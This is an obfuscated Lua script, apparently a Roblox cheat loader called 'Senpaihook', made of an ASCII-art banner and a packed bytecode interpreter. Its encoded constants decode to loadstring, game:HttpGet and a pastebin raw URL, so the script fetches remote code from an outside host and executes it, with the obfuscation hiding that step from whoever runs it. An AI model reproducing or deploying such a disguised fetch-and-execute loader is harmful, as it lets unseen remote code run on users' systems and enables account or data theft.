--[[

  ██████ ▓█████  ███▄    █  ██▓███   ▄▄▄       ██▓ ██░ ██  ▒█████   ▒█████   ██ ▄█▀
▒██    ▒ ▓█   ▀  ██ ▀█   █ ▓██░  ██▒▒████▄    ▓██▒▓██░ ██▒▒██▒  ██▒▒██▒  ██▒ ██▄█▒ 
░ ▓██▄   ▒███   ▓██  ▀█ ██▒▓██░ ██▓▒▒██  ▀█▄  ▒██▒▒██▀▀██░▒██░  ██▒▒██░  ██▒▓███▄░ 
  ▒   ██▒▒▓█  ▄ ▓██▒  ▐▌██▒▒██▄█▓▒ ▒░██▄▄▄▄██ ░██░░▓█ ░██ ▒██   ██░▒██   ██░▓██ █▄ 
▒██████▒▒░▒████▒▒██░   ▓██░▒██▒ ░  ░ ▓█   ▓██▒░██░░▓█▒░██▓░ ████▓▒░░ ████▓▒░▒██▒ █▄
▒ ▒▓▒ ▒ ░░░ ▒░ ░░ ▒░   ▒ ▒ ▒▓▒░ ░  ░ ▒▒   ▓▒█░░▓   ▒ ░░▒░▒░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒ ▒▒ ▓▒
░ ░▒  ░ ░ ░ ░  ░░ ░░   ░ ▒░░▒ ░       ▒   ▒▒ ░ ▒ ░ ▒ ░▒░ ░  ░ ▒ ▒░   ░ ▒ ▒░ ░ ░▒ ▒░
░  ░  ░     ░      ░   ░ ░ ░░         ░   ▒    ▒ ░ ░  ░░ ░░ ░ ░ ▒  ░ ░ ░ ▒  ░ ░░ ░ 
      ░     ░  ░         ░                ░  ░ ░   ░  ░  ░    ░ ░      ░ ░  ░  ░   

                            made by @cursynwashere
                       https://guns.lol/cursyn (for discord)                                                       

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=0;local v84;while true do if (v83==0) then v84=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-1)) + (2 -(1 + 0)))) ;return v84-(v84%((1497 -(282 + 595)) -(555 + 64))) ;end end else local v85=((2570 -(1523 + 114)) -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=(1270 -(226 + 1044)) + 0 ;local v35;while true do if (v34==1) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1066 -(68 + 997) ;end end end local function v22() local v36=(0 -0) -0 ;local v37;local v38;while true do if (v36==(118 -(32 + 85))) then return (v38 * (251 + 5)) + v37 ;end if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + 2 ;v36=1;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + 4 ;return (v42 * (16777566 -(87 + 263))) + (v41 * (120312 -54776)) + (v40 * 256) + v39 ;end local function v24() local v43=0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==((6 -4) -1)) then v46=1 + 0 ;v47=(v20(v45,3 -2 ,9 + 11 ) * (((4516 -3562) -(802 + 150))^(85 -53))) + v44 ;v43=3 -1 ;end if (v43==(0 + 0 + 0)) then v44=v23();v45=v23();v43=1 + 0 ;end if (v43==(1000 -(915 + 82))) then if (v48==(772 -(201 + 571))) then if (v47==(1138 -((399 -283) + 1022))) then return v49 * 0 ;else v48=2 -1 ;v46=0 + 0 ;end elseif (v48==2047) then return ((v47==0) and (v49 * ((1 -0)/(1187 -(1069 + 118))))) or (v49 * NaN) ;end return v8(v49,v48-((4067 -(760 + 987)) -1297) ) * (v46 + (v47/((3 -1)^(911 -(814 + 45))))) ;end if (v43==(4 -2)) then v48=v20(v45,4 + 17 ,54 -23 );v49=((v20(v45,32 + 0 )==(792 -(368 + 423))) and  -(1 -0)) or ((1916 -(1789 + 124)) -2) ;v43=21 -((776 -(745 + 21)) + 3 + 5) ;end end end local function v25(v50) local v51=0 -0 ;local v52;local v53;while true do if (v51==3) then return v6(v53);end if (v51==(0 -0)) then v52=nil;if  not v50 then local v96=0 + 0 ;while true do if (v96==(0 + (1817 -(1703 + 114)))) then v50=v23();if (v50==(1055 -(87 + 968))) then return "";end break;end end end v51=4 -3 ;end if (v51==2) then v53={};for v90=1 + 0 , #v52 do v53[v90]=v2(v1(v3(v52,v90,v90)));end v51=6 -3 ;end if (v51==(1414 -(447 + 966))) then v52=v3(v16,v18,(v18 + v50) -(2 -1) );v18=v18 + v50 ;v51=2;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 1581 -(1535 + 46) ;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do local v67=(function() return 0 + 0 ;end)();while true do if (v67==0) then if (0~=v54) then else local v97=(function() return 0 + 0 ;end)();local v98=(function() return;end)();while true do if (v97~=0) then else v98=(function() return 0;end)();while true do if (v98~=(561 -(306 + 254))) then else v57=(function() return {};end)();v58=(function() return {v55,v56,nil,v57};end)();v98=(function() return 2;end)();end if (v98==(3 -1)) then v54=(function() return  #"[";end)();break;end if (v98==0) then v55=(function() return {};end)();v56=(function() return {};end)();v98=(function() return 1468 -(899 + 568) ;end)();end end break;end end end if (v54~= #"[") then else local v99=(function() return 0 + 0 ;end)();local v100=(function() return;end)();while true do if (v99~=(0 -0)) then else v100=(function() return 0;end)();while true do if (v100==(604 -(268 + 335))) then for v152= #"{",v59 do local v153=(function() return 0;end)();local v154=(function() return;end)();local v155=(function() return;end)();local v156=(function() return;end)();while true do if (v153==1) then v156=(function() return nil;end)();while true do if (v154~=1) then else if (v155== #"/") then v156=(function() return v21()~=(290 -(60 + 230)) ;end)();elseif (v155==(574 -(426 + 146))) then v156=(function() return v24();end)();elseif (v155~= #"-19") then else v156=(function() return v25();end)();end v60[v152]=(function() return v156;end)();break;end if (v154==(0 + 0)) then local v166=(function() return 0;end)();local v167=(function() return;end)();while true do if (v166==(1456 -(282 + 1174))) then v167=(function() return 0;end)();while true do if (v167==0) then v155=(function() return v21();end)();v156=(function() return nil;end)();v167=(function() return 1;end)();end if ((812 -(569 + 242))==v167) then v154=(function() return 2 -1 ;end)();break;end end break;end end end end break;end if (v153~=0) then else v154=(function() return 0;end)();v155=(function() return nil;end)();v153=(function() return 1;end)();end end end v58[ #"xnx"]=(function() return v21();end)();v100=(function() return 2;end)();end if (v100==2) then v54=(function() return 1 + 1 ;end)();break;end if (v100~=(1024 -(706 + 318))) then else v59=(function() return v23();end)();v60=(function() return {};end)();v100=(function() return 1252 -(721 + 530) ;end)();end end break;end end end v67=(function() return 1;end)();end if (v67~=1) then else if (2~=v54) then else for v101= #"\\",v23() do local v102=(function() return v21();end)();if (v20(v102, #"\\", #" ")~=(1271 -(945 + 326))) then else local v105=(function() return 0;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v105~=(0 -0)) then else local v147=(function() return 0 + 0 ;end)();local v148=(function() return;end)();while true do if (v147==(700 -(271 + 429))) then v148=(function() return 0 + 0 ;end)();while true do if (v148==1) then v105=(function() return 1501 -(1408 + 92) ;end)();break;end if (v148==(1086 -(461 + 625))) then local v164=(function() return 1288 -(993 + 295) ;end)();while true do if (v164~=0) then else v106=(function() return v20(v102,2, #"91(");end)();v107=(function() return v20(v102, #"0313",6);end)();v164=(function() return 1 + 0 ;end)();end if (v164~=(1172 -(418 + 753))) then else v148=(function() return 1 + 0 ;end)();break;end end end end break;end end end if (v105==(1 + 2)) then if (v20(v107, #"gha", #"gha")== #">") then v108[ #"0313"]=(function() return v60[v108[ #"?id="]];end)();end v55[v101]=(function() return v108;end)();break;end if (v105==(1 + 0)) then local v150=(function() return 0;end)();local v151=(function() return;end)();while true do if (v150==(0 + 0)) then v151=(function() return 529 -(406 + 123) ;end)();while true do if (v151==(1770 -(1749 + 20))) then v105=(function() return 2;end)();break;end if (v151~=0) then else v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==(1322 -(1249 + 73))) then local v168=(function() return 0 + 0 ;end)();local v169=(function() return;end)();while true do if (v168~=(1145 -(466 + 679))) then else v169=(function() return 0 -0 ;end)();while true do if (v169~=0) then else v108[ #"gha"]=(function() return v22();end)();v108[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v106== #">") then v108[ #"nil"]=(function() return v23();end)();elseif (v106==2) then v108[ #"gha"]=(function() return v23() -(2^(45 -29)) ;end)();elseif (v106== #"gha") then local v174=(function() return 0;end)();local v175=(function() return;end)();while true do if (v174~=0) then else v175=(function() return 0;end)();while true do if (v175==(1900 -(106 + 1794))) then v108[ #"nil"]=(function() return v23() -(2^16) ;end)();v108[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v151=(function() return 1 + 0 ;end)();end end break;end end end if (v105==(1 + 1)) then if (v20(v107, #".", #"]")== #"|") then v108[5 -3 ]=(function() return v60[v108[5 -3 ]];end)();end if (v20(v107,116 -(4 + 110) ,586 -(57 + 527) )~= #".") then else v108[ #"91("]=(function() return v60[v108[ #"xnx"]];end)();end v105=(function() return 3;end)();end end end end for v103= #".",v23() do v56[v103-#"." ]=(function() return v28();end)();end return v58;end break;end end end end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[2];local v66=v61[1430 -((794 -(239 + 514)) + 1386) ];return function(...) local v68=v64;local v69=v65;local v70=v66;local v71=v27;local v72=104 -(6 + 11 + 86) ;local v73= -(1 + 0);local v74={};local v75={...};local v76=v12("#",...) -(2 -1) ;local v77={};local v78={};for v86=166 -(122 + 44) ,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + (1 -0) ];else v78[v86]=v75[v86 + (3 -2) ];end end local v79=(v76-v70) + 1 + 0 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1 + 0 + 0 + 0 ];if (v81<=(16 -9)) then if ((v81<=((1207 -(373 + 829)) -2)) or (3755<=915)) then if (v81<=(66 -(30 + 35))) then if (v81==(0 + 0)) then local v109=v80[1259 -(1043 + (945 -(476 + 255))) ];local v110=v78[v80[(1141 -(369 + 761)) -8 ]];v78[v109 + ((702 + 511) -(323 + 889)) ]=v110;v78[v109]=v110[v80[10 -6 ]];else v78[v80[582 -(361 + 219) ]]();end elseif (v81==(322 -(53 + (484 -217)))) then v78[v80[1 + 1 ]]={};else v78[v80[415 -(15 + 398) ]]();end elseif (v81<=(987 -(18 + 964))) then if (v81>(14 -10)) then local v115=v80[2 + 0 ];local v116=v78[v80[2 + 1 ]];v78[v115 + (1 -0) ]=v116;v78[v115]=v116[v80[854 -(20 + 830) ]];else v78[v80[(240 -(64 + 174)) + 0 + 0 ]]=v63[v80[3]];end elseif (v81==(132 -(116 + 10))) then v78[v80[(1 -0) + 1 ]]=v80[741 -(542 + 196) ];else do return;end end elseif ((3946>3743) and (v81<=(23 -12))) then if (v81<=(3 + 6)) then if (v81==8) then local v124=v80[2 + 0 ];v78[v124]=v78[v124](v13(v78,v124 + 1 + 0 ,v73));else v78[v80[4 -2 ]]=v63[v80[7 -4 ]];end elseif ((v81>(1561 -(1126 + 425))) or (1335>=3306)) then local v128=405 -(118 + 287) ;local v129;while true do if ((4844>2253) and (v128==((336 -(144 + 192)) -0))) then v129=v80[2];v78[v129]=v78[v129](v13(v78,v129 + 1 ,v73));break;end end else local v130=v80[1123 -((334 -(42 + 174)) + 1003) ];local v131,v132=v71(v78[v130](v13(v78,v130 + (2 -1) ,v80[380 -(142 + 235) ])));v73=(v132 + v130) -(4 -3) ;local v133=0 + 0 ;for v141=v130,v73 do local v142=977 -(553 + 424) ;while true do if ((452==452) and (v142==0)) then v133=v133 + (1 -(0 + 0)) ;v78[v141]=v131[v133];break;end end end end elseif ((v81<=13) or (4557<2087)) then if ((3874==3874) and (v81==(11 + 1))) then local v134=v80[2];local v135,v136=v71(v78[v134](v13(v78,v134 + 1 + 0 ,v80[2 + 1 ])));v73=(v136 + v134) -(1 + 0) ;local v137=0 + 0 + 0 ;for v143=v134,v73 do v137=v137 + 1 ;v78[v143]=v135[v137];end else v78[v80[4 -2 ]]={};end elseif (v81==(38 -24)) then v78[v80[4 -2 ]]=v80[1 + 2 ];else do return;end end v72=v72 + (4 -3) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F61786D644133646800094Q000D7Q001209000100013Q001209000200023Q00202Q00020002000300120E000400044Q000A000200044Q000800013Q00022Q00030001000100012Q00073Q00017Q00",v9(),...);
